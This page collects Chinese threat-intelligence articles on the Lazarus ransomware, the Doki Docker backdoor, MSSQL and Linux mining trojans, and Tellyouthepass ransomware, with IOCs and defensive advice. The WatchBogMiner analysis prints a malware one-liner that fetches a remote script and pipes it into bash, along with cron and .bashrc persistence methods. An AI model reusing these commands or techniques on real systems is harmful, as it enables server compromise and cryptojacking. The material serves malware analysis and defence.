分类: 威胁情报

卡巴斯基报告:Lazarus APT 组织的大型狩猎游戏

毫无疑问,2020 年将成为历史上令人不愉快的一年。在网络安全领域,针对目标的勒索软件攻击日益增加,集体的伤害就更加明显。通过调查许多此类事件,并通过与一些值得信赖的行业合作伙伴讨论,我们认为我们现在对勒索软件生态系统的结构有了很好的了解。 勒索软件生态系统的结构犯罪分子利用广泛传播的僵尸网络感染(例如,臭名昭著的 Emotet 和 Trickbot 恶意软件家族)传播到受害者和第三方开发者的勒索软件“产品”的网络中。当攻击者对目标的财务状况和IT流程有充分了解后,他们就会在公司的所有资产上部署勒索软件,并进入谈判阶段。 这个生态系统在独立、高度专业化的集群中运行,在大多数情况下,除了业务联系之外,这些集群彼此之间没有联系。这就是威胁行为者的概念变得模糊的原因:负责最初破坏的组织不太可能是破坏受害者的 Active Directory 服务器的一方,而该服务器又不是事件中实际使用的勒索软件代码的一方。更重要的是,在两起事件中,同一罪犯可能会交换业务伙伴,并且可能利用不同的僵尸网络或勒索软件家族。 当然,没有一个复杂的生态系统可以用一套单一的、严格的规则来描述。在本文中,我们描述了2020年3月至2020年5月之间进行的两次调查中出现的异常之处。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1279/     消息来源:kaspersky,译者:吴烦恼。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

注意容器安全:Doki 感染云中的 Docker 服务器

主要发现 Ngrok Mining Botnet是一个活跃的活动,目标是AWS、Azure和其他云平台中公开的Docker服务器,它已经活跃了至少两年。 我们检测到了最近的一次攻击,其中包括使用区块链钱包生成C&C域名的完全未检测到的Linux恶意软件和以前未记录的技术。 任何具有公开开放的Docker API访问权限的人都有可能在短短几个小时内被黑客入侵。这很可能是由于黑客对脆弱的受害者进行了自动且连续的全互联网扫描所致。 自2020年1月14日首次分析以来,VirusTotal的60个恶意软件检测引擎中尚未检测到被称为“ Doki ”的新恶意软件。 攻击者正在使用受感染的受害者搜索其他易受攻击的云服务器。 介绍 Linux威胁变得越来越普遍。造成这种情况的一个因素是,对云环境的转移和依赖日益增加,而云环境主要基于Linux基础架构。因此,攻击者已经采用了专门为此基础结构设计的新工具和技术。 一种流行的技术是滥用配置错误的Docker API端口,攻击者在其中扫描可公开访问的Docker服务器,并利用它们来设置自己的容器并在受害者的基础设施上执行恶意软件。 Ngrok僵尸网络是利用Docker API端口进行的持续时间最长的攻击活动之一,之前由Netlab和Trend Micro的研究人员报道过。作为攻击的一部分,攻击者滥用Docker配置功能,以逃避标准容器限制并从主机执行各种恶意负载。他们还部署了网络扫描仪,并使用它扫描云提供商的IP范围,以查找其他潜在的易受攻击目标。我们的证据表明,从新配置错误的Docker服务器上线到感染此活动仅需几个小时。 最近,我们检测到一种新的恶意软件有效负载,该负载与通常在此攻击中部署的标准加密矿工不同。该恶意软件是一个完全未被发现的后门,我们将其命名为Doki。 Doki使用一种以前未记录的方法,以一种独特的方式滥用狗狗币加密货币区块链来联系其运营商,以便动态生成其C2域名地址。尽管VirusTotal公开提供了样本,但该恶意软件已成功躲藏了六个月以上。 在本文中,我们将介绍攻击并提供对未检测到的Doki后门实施的技术的详细分析。     … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1278/       消息来源:intezer,译者:叶绿体。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

数万台 MSSQL 服务器遭爆破入侵,已沦为门罗币矿机

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/znFP8IjcC3KIuPfsm_93oA     一、概述 腾讯安全威胁情报中心检测到针对MS SQL服务器攻击的挖矿木马,该挖矿木马主要针对MS SQL服务进行爆破弱口令攻击,爆破成功后会植入门罗币挖矿木马进行挖矿。同时攻击者下载frpc内网穿透工具安装后门,并会添加用户以方便入侵者远程登录该服务器。 从挖矿木马的HFS服务器计数看,已有上万台MS SQL服务器被植入挖矿木马,另有数十台服务器被安装后门。攻击者在失陷服务器上安装内网穿透工具会进一步增加黑客入侵风险,企业数据库服务器沦陷会导致严重信息泄露事件发生。 腾讯安全专家建议企业在所有服务器上避免使用弱口令,爆破攻击通常是黑客试水的第一步,使用弱口令非常容易导致企业资产被入侵。腾讯T-Sec终端安全管理系统(御点)已可拦截查杀该挖矿木马。 腾讯安全旗下安全产品已针对该挖矿木马的入侵行为进行检测和拦截,具体响应清单如下: 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)该木马相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1) 腾讯云镜支持Mssql弱密码检测; 2)腾讯云镜支持查杀该挖矿木马。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 (Cloud Workload Protection,CWP) 1)腾讯漏洞扫描服务已支持监测全网资产是否受MSSQL弱密码影响。 关于腾讯T-Sec网络资产风险监测系统的更多信息,可参考:https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯漏洞扫描服务等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)对利用mssql爆破入侵的相关协议特征进行识别检测; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)查杀该团伙入侵释放的挖矿程序,内网端口映射工具; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 二、样本分析 该黑产团伙对mssql服务器进行爆破成功后,会下载执行HFS服务器上的恶意文件,从下载量来看,受感染的服务器有数万台,被植入后门的服务器有数十台,挖矿木马HFS文件列表如下: Adduser.exe,添加后门账户,用于后续远程登陆。 SQL.exe执行后释放4个文件到c:\windows\Fonts目录中 c:\windows\Fonts\Csrss.exe是NSSM服务封装程序,用于将sqlwriters.exe注册为服务,服务名为SQLServer Sqlwrites.exe是基于xmrig 6.2的挖矿程序 矿池: xmr.hex7e4.ru:3333 d2pool.ddns.net:3333 xmr.hex7e4.ru:3333 d2pool.ddns.net:3333 Frp_C.exe执行后释放以下文件到c:\windows\Fonts中 Dllhost.exe是一款开源的内网穿透工具Frpc,Bat负责生成frpc配置文件,以及设置服务启动项,目的是将本机的3389端口暴露给黑客服务器frp.hex7e4.ru,黑客可直接通过RDP连接到受害服务器,进而控制企业内网。 IOCs Doamin xxx.hex7e4.ru xmr.hex7e4.ru d3d.hex7e4.ru IP 43.229.149.62 185.212.128.180 URLs hxxp://43.229.149.62:8080/web/Add.exe hxxp://43.229.149.62:8080/web/AddUser.exe hxxp://43.229.149.62:8080/web/dw.exe hxxp://43.229.149.62:8080/web/Frp_C.exe hxxp://43.229.149.62:8080/web/frpc.exe hxxp://43.229.149.62:8080/web/frpc.ini hxxp://43.229.149.62:8080/web/po.jpg hxxp://43.229.149.62:8080/web/se.jpg hxxp://43.229.149.62:8080/web/SQL.exe hxxp://43.229.149.62:8080/web/sqlwriters.jpg hxxp://43.229.149.62:8080/web/sqlwriters1.jpg hxxp://43.229.149.62:8080/web/xx.txt hxxp://43.229.149.62:8080/web/xxx.txt MD5 9a745dc59585a5ad76fee0867acd1427 statr.bat 301257a23e2cad9da915cd942c833146 sqlwriters.exe 9a22fe62ebad16edc5c489c9493a5882 Frp_C.exe 88527fecde10ca426680d5baf6b384d1 po.jpg e27ba54c177c891ad3077de230813373 xxx.txt 2176ecfe4d91964ffec346dd1527420d xx.txt f457a5f0472e309c574795ca339ab566 sql.exe

WatchBogMiner 木马发起漏洞攻击,已控制上万台 Linux 服务器挖矿

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/5bt4XtP2NNFssl7QbF2S0Q   一、背景 腾讯安全威胁情报中心检测到针对Linux服务器进行攻击的WatchBogMiner变种挖矿木马。该木马利用Nexus Repository Manager、Supervisord、ThinkPHP等服务器组件的远程代码执行漏洞进行攻击,在失陷机器安装多种类型的持久化攻击代码,然后植入门罗币挖矿木马进行挖矿,腾讯安全专家根据木马使用的算力资源推测已有上万台Linux服务器被黑客控制。 木马通过第三方网站Pastebin保存恶意代码以躲避检测,并且通过各类方法进行持久化,定期拉取挖矿木马加载到内存执行,同时会在启动后删除木马文件以达到“隐身”目的。和其他挖矿木马类似,WatchBogMiner木马挖矿时,会清除其他挖矿木马以独占服务器。 WatchBogMiner变种攻击代码还会通过失陷机器已认证过的SSH RSA进行SSH连接和执行远程命令进行横向移动,以扩大其影响范围。根据其钱包算力(120Kh/s)推测,木马已控制约1万台服务器进行挖矿。 腾讯安全专家建议企业网管对Linux服务器进行安全检测,及时清除挖矿木马,及时修复服务器组件存在的高危漏洞,避免遭遇更严重的损失,检测方案可参考腾讯安全系列产品应对WatchBogMiner挖矿木马的响应清单进行: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)WatchBogMiner黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)WatchBogMiner黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)WatchBogMiner关联的IOCs已支持识别检测; 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)已支持查杀WatchBogMiner相关木马程序; 2)已支持Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)检测 ; 3)已支持Supervisord远程命令执行漏洞(CVE-2017-11610)检测; 4)已支持ThinkPHP远程命令执行漏洞检测。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 (Vulnerability Scan Service,VSS) 1)腾讯VSS已支持检测全网资产是否存在Nexus Repository Manager、Supervisord、ThinkPHP等服务器组件高危漏洞; 关于腾讯T-Sec漏洞扫描服务的更多信息,可参考:https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)通过协议检测WatchBogMiner木马与服务器的网络通信; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀WatchBogMiner团伙入侵释放的木马程序; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 二、样本分析 WatchBogMiner使用Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)、Supervisord远程命令执行漏洞(CVE-2017-11610)、ThinkPHP远程命令执行漏洞的EXP代码对服务器进行扫描和攻击,并通过Payload执行https[:]//pastebin.com/raw/1eDKHr4r。失陷机器被安装的恶意定时任务如下: 为逃避检测,攻击者使用第三方网站Pastebin来保存恶意代码,该网站不会被网络防御方判断为恶意网站。WatchBogMiner变种用于存放恶意代码的Pastebin账号为”LISTTIME”,创建于2020年4月20日。 https[:]//pastebin.com/raw/1eDKHr4r跳转https[:]//pastebin.com/raw/UhUmR517 “UhUmR517”上保存的内容经过base64解码后,会得到以下shell脚本,包括有system()、cronhigh()、gettarfile()、download()、testa()、kill_miner_proc()等函数,会完成持久化、挖矿、横向移动等功能,是该病毒的主要攻击脚本。 脚本首先定义了4个变量,内容分别如下: house=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzFlREtIcjRy|base64 -d) park=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2I1eDFwUnpL|base64 -d) beam=$(echo c2FkYW42NjYueHl6OjkwODAvcnI=|base64 -d) deep=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1NqaldldlRz|base64 -d) surf=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3R5am5UUVRB|base64 -d) 经过base64解码后: house= https[:]//pastebin.com/raw/1eDKHr4r park= https[:]//pastebin.com/raw/b5x1pRzK beam= sadan666.xyz:9080/rr deep= https[:]//pastebin.com/raw/SjjWevTs surf= https[:]//pastebin.com/raw/tyjnTQTA 其中house、park、beam都会跳转得到“UhUmR517”脚本,而deep、surf会返回函数名“dragon”和“lossl”。 持久化模块通过多种方式定期执行远程shell脚本:1.system()函数通过写入/etc/crontab文件,创建定时任务。 2.cronhigh()通过写入以下文件创建定时任务。 /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/system /etc/cron.d/apache /etc/cron.d/root /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane 3.cronlow()通过crontab命令创建定时任务。 4.cronbackup()通过at命令:echo “$pay” | at -m now + 1 minute添加定时任务,通过后台隐藏执行一段带有while循环的脚本:”while true; do sleep 600 && $pay; done”,同样达到定时任务效果。 5.cronc()通过写入环境变量文件”/home/$me/.bashrc”、”/root/.bashrc”执行定时任务。 挖矿模块为download()和testa(),分别从https[:]//pastebin.com/raw/GMdeWqec、 https[:]//pastebin.com/raw/Esctfgrx下载$mi_64和$st_64,经过解码后得到XMRig、xmr-stak修改而成的挖矿程序,保存为: /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/javaUpDates(最初被发现时该文件名为watchbog) 然后从https[:]//pastebin.com/raw/SB0TYBvG下载得到挖矿配置文件。 矿池:pool.minexmr.com:80 钱包: 48S8kPXdSgubJYsMhpRTr4Ct1nznDzV9ohNMEbmKzgeJLwWPV2QfKzsNRDYoxWWMAdTW69EVBhRQuFr7BiCsMQoU9xAKW4U 对比新版和旧版的挖矿木马启动代码,发现新版代码在释放和启动挖矿木马之后,会sleep 15秒,然后通过rm -rf 命令将挖矿木马文件删除。 由于Linux系统进程启动时,会将文件完全映射到内存中,所以启动之后删除文件不影响已经在运行中的进程,木马用这一方法来抹掉文件痕迹从而达到隐身。木马已通过各类持久化任务定期拉取挖矿木马并加载到内存执行,即使每次执行后删除文件,也能达到挖矿进程长期驻留系统的效果。 该钱包目前挖矿获得门罗币28XMR,折合人民币13600元,矿池算力维持在120kH/s左右,这意味着持续有1万台左右的服务器被控制挖矿。 脚本还会通过Kill_miner_proc()找到并清除竞品挖矿木马。 通过Kill_sus_proc()杀死高占用CPU的可疑进程。 变种新增横向移动模块,获取/root/.ssh/known_hosts中保存的已通过SSH RSA公钥认证的IP,重新进行SSH登陆并执行远程命令进行内网扩散攻击: curl -fsSL https[:]//pastebin.com/raw/UhUmR517||wget -q -O – https[:]//pastebin.com/raw/UhUmR517)|base64 -d|bash >/dev/null 2>&1 & 三、手动清除建议: 1、 检查是否有高CPU占用的进程javaUpDates,kill掉该进程: 映像文件路径(可能已被删除):/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/javaUpDates 2、检查以下文件是否有包含“sadan666.xyz:9080/rr”的定时任务,如有将其删除: /etc/crontab /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/system /etc/cron.d/apache /etc/cron.d/root /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane 同时通过crontab命令检查有无“sadan666.xyz:9080/rr”相关定时任务,如有将其删除。 3、通过atq命令查找at任务队列,删除“sadan666.xyz:9080/rr”相关作业。 4、检查是否存在进程/tmp/crun,如果该进程每10分钟请求一次 “sadan666.xyz:9080/rr”,Kill掉该进程。 5、检查配置文件”/home/$me/.bashrc”、”/root/.bashrc”是否包含“sadan666.xyz:9080/rr”相关内容,如有将其删除。 IOCs Domain sadan666.xyz IP 104.236.66.189 URL https[:]//pastebin.com/raw/1eDKHr4r https[:]//pastebin.com/raw/UhUmR517 https[:]//pastebin.com/raw/b5x1pRzK http[:]//sadan666.xyz:9080/rr https[:]//pastebin.com/raw/SjjWevTs https[:]//pastebin.com/raw/tyjnTQTA https[:]//pastebin.com/raw/Esctfgrx https[:]//pastebin.com/raw/GMdeWqec https[:]//pastebin.com/raw/SB0TYBvG https[:]//pastebin.com/raw/Zkz0d9Jz https[:]//pastebin.com/raw/mvSEGmR6 md5 mi_64 88b658853b9ececc48f5cac2b7b3f6f6 st_64 ad17226de6cc93977fb7c22c7a27ea8e 钱包: 48S8kPXdSgubJYsMhpRTr4Ct1nznDzV9ohNMEbmKzgeJLwWPV2QfKzsNRDYoxWWMAdTW69EVBhRQuFr7BiCsMQoU9xAKW4U

Tellyouthepass 勒索病毒携带永恒之蓝攻击模块袭击内网,已有企业受害

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/DN93VBJprCrugxyIkEEHqg 一、概述 腾讯安全威胁情报中心在例行风险文件排查过程中,发现Tellyouthepass勒索病毒变种活跃。攻击者利用压缩工具打包exe的方式,将ms16-032内核提权漏洞利用模块、永恒之蓝内网扩散模块集成到勒索攻击包中,以实现内网蠕虫式病毒传播。若企业未及时修补漏洞,可能造成严重损失。 众所周知,WannaCry病毒事件就是勒索病毒利用永恒之蓝漏洞进行蠕虫化传播制造的网络灾难。只是幸运的是,永恒之蓝漏洞毕竟已经修补3年多了,未修复该漏洞的Windows系统只占少数。 查看Tellyouthepass勒索病毒用于交易的比特币钱包地址,发现近期已产生多笔交易,钱包当前余额0.69比特币。由于该勒索病毒使用了RSA+AES的方式对文件进行加密,被病毒加密后文件暂无法解密。同时具备蠕虫病毒攻击能力的勒索病毒极易在存在弱点的企业内网广泛传播,我们提醒各政企机构高度警惕。腾讯电脑管家、腾讯T-Sec终端安全管理系统均可查杀Tellyouthepass勒索病毒。 腾讯安全全系列安全产品针对Tellyouthepass勒索病毒的响应清单如下: 应用场景 安全产品 解决方案 威胁 情报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)Tellyouthepass勒索病毒相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)Tellyouthepass勒索相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)Tellyouthepass勒索网络相关联的IOCs已支持识别检测; 2)下发访问控制规则封禁目标端口,主动拦截永恒之蓝漏洞MS17-010相关访问流量。 有关云防火墙的更多信息,可参考:https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)云镜已支持查杀Tellyouthepass相关联的传播利用模块,勒索模块; 2)云镜已支持永恒之蓝漏洞MS17-010的检测。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec漏洞扫描服务 (Vulnerability Scan Service,VSS) 1)腾讯漏洞扫描服务已支持检测全网资产是否受永恒之蓝漏洞MS17-010影响; 2)已集成无损检测POC,企业可以对自身资产进行远程检测。 关于腾讯T-Sec漏洞扫描服务的更多信息,可参考:https://cloud.tencent.com/product/vss 腾讯T-Sec安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)Tellyouthepass相关联的IOCs已支持识别检测; 2)已支持对利用永恒之蓝漏洞MS17-010协议特征进行识别检测。 关于T-Sec高级威胁检测系统的更多信息,可参考:https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)企业终端管理系统可查杀Tellyouthepass相关联的传播利用模块,勒索模块; 2)企业终端管理系统已支持检测黑产利用永恒之蓝漏洞MS17-010入侵相关的网络通信。 3)企业终端管理系统可对系统内高危漏洞进行一键修复 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 二、样本分析 完整攻击利用包是一个使用压缩工具打包的exe执行程序,运行后会首先执行其包中的run_update.bat脚本。 run_update.bat脚本则进一步以awindows_privedge.exe作为父进程启动其它两模块 awindows_privedge.exe为ms16-032内核提权漏洞利用程序,攻击者试图以SYSTEM权限执行其它攻击模块,从而达到勒索加密文件覆盖面更广,内网扩散攻击过程更稳定的效果。 Lantools_exp.exe是一个Python打包的exe程序,解包反编译后可知该模块为针对smb进行攻击利用的工具集,其中包含了对smb服务的远程探测,smb登录psexec命令执行,端口扫描,http服务搭建等功能,同时该工具包含了永恒之蓝漏洞高危漏洞(MS17-010)的攻击利用,该模块运行后将进行内网蠕虫扩散debug.exe病毒模块。 病毒使用开源的永恒之蓝漏洞利用攻击相关代码 https://github.com/mez-0/MS17-010-Python/blob/master/zzz_exploit.py https://github.com/pythonone/MS17-010/blob/master/exploits/eternalblue debug.exe文件依然为使用压缩包打包的可执行程序,执行后首先运行debug.bat,脚本随后启动windebug.exe执行。 windebug.exe模块为go语言编写的Tellyouthepass勒索病毒,病毒运行后会首先生成RSA-1024本地密钥对。 随后使用硬编码的RSA-2048-PulbicKey对本地生成的RSA-1024-PrivateKey进行加密,并Base64编码保存作为勒索信中的personid部分内容。 硬编码RSA-2048 PublicKey信息 加密时对每个文件随机生成AES-KEY和IV,共计0x30字节 使用本地RSA-1024-Public-Key将AES-Key和IV加密后保存到文件头,共0x80字节数据。 最终对文件使用AES-CFB128模式进行全部加密 加密完成后文件均被添加.locked扩展后缀,同时留下名为README.html的勒索说明信件,勒索新提示要求使用BTC进行交易,查看其使用的钱包之一地址可知,近期已进行过7次交易,钱包内当前余额0.699比特币。 三、安全建议 根据该勒索病毒的特性,腾讯安全专家建议相关企业和个人用户参考以下建议强化网络抗攻击能力,修复高危漏洞,避免内网遭遇攻击而造成无法挽回的损失: 企业用户: 1、尽量关闭不必要的端口,如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的IP连接登陆。 2、尽量关闭不必要的文件共享,如有需要,请使用ACL和强密码保护来限制访问权限,禁用对共享文件夹的匿名访问。 3、采用高强度的密码,避免使用弱口令密码,并定期更换密码。建议服务器密码使用高强度且无规律密码,并且强制要求每个服务器使用不同密码管理。 4、对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器。 5、对重要文件和数据(数据库等数据)进行定期非本地备份。 6、教育终端用户谨慎下载陌生邮件附件,若非必要,应禁止启用Office宏代码。 7、在终端/服务器部署专业安全防护软件,Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务。 8、建议全网安装腾讯T-Sec终端安全管理系统(御点)(https://s.tencent.com/product/yd/index.html)。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控,以及策略管控等全方位的安全管理功能,可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。 个人用户: 1、启用腾讯电脑管家,勿随意打开陌生邮件,关闭Office执行宏代码; 2、使用腾讯电脑管家或Windows Update扫描修复系统漏洞; 3、启用腾讯电脑管家的文档守护者功能,利用磁盘冗余空间自动备份数据文档,即使发生意外,数据也可有备无患。 IOCs MD5 0a0d5d2d3c663c54a92cb11f7102eb39 4d087a11abc7ebd998ab1283676f7a97 08b94446162ed7a1a1b078d6ad5907f5 33aa4d88e79595b3a558ce205a331d43 62883c84dc55eb65fd713416957d8524 1992134d3f21def5de107f414b6b2067 cf89542ef0095543a46bb79f0e06fb3a fa3f30b22757cb0ce2148cbd3d1198dd    

警惕 BasedMiner 挖矿木马爆破SQL弱口令入侵挖矿

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/b9Nkl6q4xLoADNosP9jFkw 一、背景 腾讯安全威胁情报中心检测到针对Windows服务器进行攻击的挖矿木马BasedMiner。该挖矿木马团伙主要针对MS SQL服务进行爆破弱口令攻击,爆破成功后会下载Gh0st远控木马对系统进行控制,还会利用多个Windows漏洞进行提权攻击获得系统最高权限,植入门罗币挖矿木马进行挖矿,目前已获利8000元。 因其远控模块名为based.dll,腾讯安全中心将其命名为BasedMiner。BasedMiner入侵后在企业服务器植入远控木马,可能导致受害企业机密信息泄露,挖矿时严重消耗服务器资源,会影响正常业务运行。腾讯安全专家建议企业检查纠正使用弱口令登录服务器,修复服务器存在的安全漏洞,避免挖矿团伙入侵。 腾讯安全系列产品应对BasedMiner挖矿木马的响应清单如下,建议企业网管参考检查: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)BasedMiner挖矿木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)BasedMiner挖矿木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)BasedMiner挖矿木马关联的IOCs已支持识别检测; 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)已支持查杀BasedMiner相关后门程序; 2)已支持 MS SQL弱密码检测 ; 3) 已支持Windows系统提权漏洞CVE-2018-8639检测; 4)已支持Windows系统提权漏洞CVE-2017-0213检测。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)通过协议检测BasedMiner相关木马与服务器的网络通信; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 非云企业安全防护 腾讯T-Sec终端安全管理系统(御点) 1)可查杀BasedMiner挖矿木马团伙入侵释放的后门木马程序; 2)腾讯御点可支持终端检查修复Windows提权漏洞(CVE-2018-8639)。 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 二、样本分析 攻击团伙对MS SQL服务器爆破成功后,会通过shellcode直接下载挖矿模块lsass.txt、提权攻击模块8639.exe、New.exe以及远控模块Test.txt。 远控模块Test.txt被保存至C:\ProgramData\svchost.exe并执行,从资源文件中获取二进制数据“0X64”,写入文件C:\Program Files (x86)\Common Files\based.dll并加载到内存执行。 将based.dll写入注册表 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WcCemsvc_connection\Parameters,安装为服务” WcCemsvc_connection”进行启动。 该DLL为Gh0st远控木马模块,导出函数ServiceMain,首次加载时传入参数“install”进行安装,通过服务启动之后连接C2地址www[.]bjcptj.com:19966,执行各类远控命令。 8639.exe是Windows提权漏洞CVE-2018-8639利用程序,文件属性伪装成搜狗输入法安装程序(注意文件属于并无搜狗公司的数字签名,一看就知道这是伪造的)。 漏洞攻击程序作者为ze0r(https[:]//github.com/ze0r/CVE-2018-8639-exp) New.exe是Windows提权漏洞CVE-2017-0213利用程序。 